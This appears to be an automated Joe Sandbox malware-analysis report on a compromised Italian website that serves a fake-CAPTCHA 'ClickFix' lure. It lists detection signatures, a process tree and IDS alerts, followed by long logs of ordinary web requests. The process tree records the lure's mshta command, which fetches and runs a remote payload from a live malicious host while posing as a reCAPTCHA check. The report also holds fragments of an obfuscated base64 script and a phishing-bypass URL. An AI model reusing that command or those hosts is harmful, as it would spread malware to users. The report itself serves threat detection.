Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://www.cipassoitalia.it/

Overview

General Information

Sample URL:http://www.cipassoitalia.it/
Analysis ID:1583836
Infos:

Detection

CAPTCHA Scam ClickFix
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detect drive by download via clipboard copy & paste
Suricata IDS alerts for network traffic
Yara detected CAPTCHA Scam ClickFix
HTML page contains hidden javascript code
HTML page contains obfuscated script src
Potential browser exploit detected (process start blacklist hit)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Use Short Name Path in Command Line
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6344 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6952 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1908,i,14487549043313255646,10754558646077735091,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6640 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://www.cipassoitalia.it/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • mshta.exe (PID: 8184 cmdline: "C:\Windows\system32\mshta.exe" https://solve.jrqr.org/awjxs.captcha?u=21187cdf-b91f-4f27-aae8-45cec9395e7c # ? ''I am not a robot - reCAPTCHA Verification ID: 3943'' MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • iexplore.exe (PID: 6376 cmdline: "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding MD5: CFE2E6942AC1B72981B3105E22D3224E)
    • iexplore.exe (PID: 6764 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:9474 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
      • ssvagent.exe (PID: 7392 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
    • ssvagent.exe (PID: 3728 cmdline: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new MD5: F9A898A606E7F5A1CD7CFFA8079253A0)
    • iexplore.exe (PID: 7524 cmdline: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:75012 /prefetch:2 MD5: 6F0F06D6AB125A99E43335427066A4A1)
    • msedge.exe (PID: 1952 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" -- "https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4" MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 3568 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2408 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 7392 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6332 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • msedge.exe (PID: 6200 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6552 --field-trial-handle=1968,i,17212161193525190570,5009424471447963821,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
1.0.pages.csvJoeSecurity_CAPTCHAScamYara detected CAPTCHA Scam/ ClickFixJoe Security
    Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, CommandLine|base64offset|contains: w, Image: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, NewProcessName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, OriginalFileName: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe, ParentCommandLine: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6376 CREDAT:9474 /prefetch:2, ParentImage: C:\Program Files (x86)\Internet Explorer\iexplore.exe, ParentProcessId: 6764, ParentProcessName: iexplore.exe, ProcessCommandLine: "C:\PROGRA~2\Java\jre-1.8\bin\ssvagent.exe" -new, ProcessId: 7392, ProcessName: ssvagent.exe
    Source: Registry Key setAuthor: frack113: Data: Details: 1, EventID: 13, EventType: SetValue, Image: C:\Program Files\Internet Explorer\iexplore.exe, ProcessId: 6376, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\SecuritySafe
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-03T17:33:40.973021+010028032742Potentially Bad Traffic192.168.2.1649964188.114.97.3443TCP
    2025-01-03T17:34:46.475813+010028032742Potentially Bad Traffic192.168.2.1650108104.16.124.96443TCP
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-03T17:33:19.262961+010028149041A Network Trojan was detected104.21.27.98443192.168.2.1649956TCP

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: 1.0.pages.csv, type: HTML
    Source: https://www.cipassoitalia.it/HTTP Parser: Base64 decoded: function _0xe073(_0x44773e, _0x22ec1d) { const _0x2ae953 = _0xca40(); return _0xe073 = function (_0x463722, _0x22f07e) { _0x463722 = _0x463722 - (-0x2524 + -0x12a7 + -0x1e * -0x1e7); let _0x404984 = _0x2ae953[_0x463722]; re...
    Source: https://www.cipassoitalia.it/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4ZTA3MyhfMHg0NDc3M2UsIF8weDIyZWMxZCkgewogICAgY29uc3QgXzB4MmFlOTUzID0gXzB4Y2E0MCgpOwogICAgcmV0dXJuIF8weGUwNzMgPSBmdW5jdGlvbiAoXzB4NDYzNzIyLCBfMHgyMmYwN2UpIHsKICAgICAgICBfMHg0NjM3MjIgPSBfMHg0NjM3MjIgLSAoLTB4Mj
    Source: https://www.cipassoitalia.it/HTTP Parser: Script src: data:text/javascript;base64,ZnVuY3Rpb24gXzB4ZTA3MyhfMHg0NDc3M2UsIF8weDIyZWMxZCkgewogICAgY29uc3QgXzB4MmFlOTUzID0gXzB4Y2E0MCgpOwogICAgcmV0dXJuIF8weGUwNzMgPSBmdW5jdGlvbiAoXzB4NDYzNzIyLCBfMHgyMmYwN2UpIHsKICAgICAgICBfMHg0NjM3MjIgPSBfMHg0NjM3MjIgLSAoLTB4Mj
    Source: https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4HTTP Parser: No favicon
    Source: https://t3.awagama.org/cdn-cgi/phish-bypass?atok=5CxXRy3gIXYBSZxQYjr6WUagwEOFFlA0IN62CHhpDX0-1735922003-0.0.1.1-%2Fmima.mp4HTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 40.74.67.245:443 -> 192.168.2.16:49953 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.21.27.98:443 -> 192.168.2.16:49956 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49958 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49963 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49962 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.16:49964 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.16:50103 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.16:50104 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.80.73:443 -> 192.168.2.16:50106 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.80.73:443 -> 192.168.2.16:50105 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.16.124.96:443 -> 192.168.2.16:50108 version: TLS 1.2
    Source: C:\Program Files\Internet Explorer\iexplore.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2814904 - Severity 1 - ETPRO MALWARE PowerSploit SSL Cert : 104.21.27.98:443 -> 192.168.2.16:49956
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:49964 -> 188.114.97.3:443
    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.16:50108 -> 104.16.124.96:443
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 40.74.67.245
    Source: unknownTCP traffic detected without corresponding DNS query: 40.74.67.245
    Source: unknownTCP traffic detected without corresponding DNS query: 40.74.67.245
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 40.74.67.245
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.75
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\CJump to behavior
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.cipassoitalia.itConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/css/grid.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/css/base.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/css/layout.css?ver=4.5 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/audio-player/audio-player.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/blog/blog.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/postslider/postslider.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons/buttons.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttonrow/buttonrow.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/buttons_fullwidth/buttons_fullwidth.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/catalogue/catalogue.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/comments/comments.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contact/contact.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/slideshow/slideshow.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/contentslider/contentslider.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/countdown/countdown.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery/gallery.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/gallery_horizontal/gallery_horizontal.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/google_maps/google_maps.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/grid_row/grid_row.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/heading/heading.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /wp-content/themes/enfold/config-templatebuilder/avia-shortcodes/headline_rotator/headline_rotator.css?ver=6.0.9 HTTP/1.1Host: www.cipassoitalia.itConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.cipassoitalia.it/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
